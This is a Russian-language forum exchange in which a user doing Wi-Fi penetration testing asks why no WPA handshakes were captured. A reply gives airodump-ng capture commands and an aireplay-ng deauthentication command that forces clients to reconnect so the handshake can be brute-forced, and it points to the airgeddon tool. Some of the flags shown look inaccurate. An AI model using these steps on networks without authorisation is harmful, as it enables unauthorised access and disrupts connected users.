Привет всем! В общем, тестирую я цшаш сеть на проникновениеб и вот столкнулся со следующим вопросом: я через airodump-ng перехватывал пакеты (фреймы) с трафиком, отхватил около 30-40 тысяч, и когда я остановил процес, и через aircrack-ng попробовал перевести .cap файл в .hccap для брута на hashcat я получил в ответ - что рукопожатий 0, и в итоге остался ни с чемю Вопрос: дак что же это за рукопожатия, из за чего они возникают?
хендшейк от англ. рукопожатие, возникает в момент когда клиент подключается к точке доступа.
для того что бы перехватить шейк айродампом, нужно что бы он писался в файл, пока слушаешь эфир, например:
airodump-ng -i wlan0mon --channel 1 --bssid 00:11:22:33:44:55 -o /root/Desktop/handshake.cap
-i указываешь имя интерфейса на котором висит монитор
--channel или
-c указываешь канал на котором находится цель
--bssid или
-b указываешь мак адрес цели
опцией
-о (output) ты указываешь в какой файл записывать перехваченные данные,
для того что бы захватить рукопожатие цели нужно завести второй монитор:
airmon-ng -i wlan0
и запустить во втором окне терминала деаутентификацию клиента:
aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 01:02:03:04:05:06 -i wlan1mon
где
-0 (ноль) команда посылать пакеты деаутентификации (в примере после -0 идёт 1, значит пошлётся один пакет)
-a (access point) указываешь мак адрес точки доступа
-c (client) указываешь мак адрес клиента, который подключён к точке в данный момент
-i (interface) указываешь имя интерфейса, который пошлёт пакет де-аутентификации
в окне с айродампом в правом верхнем углу должна появиться надписать
wpa-handshake
тогда можно остановить запись и в файле будет шейк.
как я понимаю, ты пошёл сложным путём - делаешь всё в ручную, но для ловли шейков уже существуют автоматические скрипты, если ты работаешь на kali, то читани тему про
аиргеддон (ещё одна
тема о нём), интуитивно понятная софтина, переведена на русский и вполне подойдёт новичку.